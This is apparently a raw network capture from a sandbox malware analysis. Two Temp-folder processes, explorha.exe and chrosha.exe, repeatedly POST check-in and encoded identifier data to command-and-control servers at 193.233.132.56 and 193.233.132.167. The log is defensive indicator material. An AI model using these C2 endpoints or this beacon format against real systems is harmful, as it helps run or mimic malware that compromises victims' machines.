Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
742         192.168.2.5  50590        193.233.132.56  80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:23.321075916 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:23.566711903 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
743 | 192.168.2.5 | 50591 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:23.602813005 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:23.853837967 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
744 | 192.168.2.5 | 50592 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:23.816232920 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:24.064618111 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
745 | 192.168.2.5 | 50593 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:24.098064899 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:24.343808889 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
746 | 192.168.2.5 | 50594 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:24.435142040 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:24.687340021 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
747 | 192.168.2.5 | 50595 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:24.696208000 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:24.943615913 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
748 | 192.168.2.5 | 50596 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:24.940733910 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:25.193413973 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
749 | 192.168.2.5 | 50597 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:25.195815086 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:25.450737953 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
750 | 192.168.2.5 | 50598 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:25.556252003 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:25.802186012 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
751 | 192.168.2.5 | 50599 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:25.801143885 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:26.045135021 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
752 | 192.168.2.5 | 50600 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:26.054770947 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:26.307419062 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
753 | 192.168.2.5 | 50601 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:26.296361923 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:26.546500921 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
754 | 192.168.2.5 | 50602 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:26.662244081 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:26.906815052 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
755 | 192.168.2.5 | 50603 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:26.899458885 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:27.149405956 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
756 | 192.168.2.5 | 50604 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:27.155600071 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:27.403345108 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
757 | 192.168.2.5 | 50605 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:27.399296045 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:27.650108099 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
758 | 192.168.2.5 | 50606 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:27.755814075 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:28.003319979 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
759 | 192.168.2.5 | 50607 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:28.004874945 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:28.244998932 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
760 | 192.168.2.5 | 50608 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:28.254482985 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
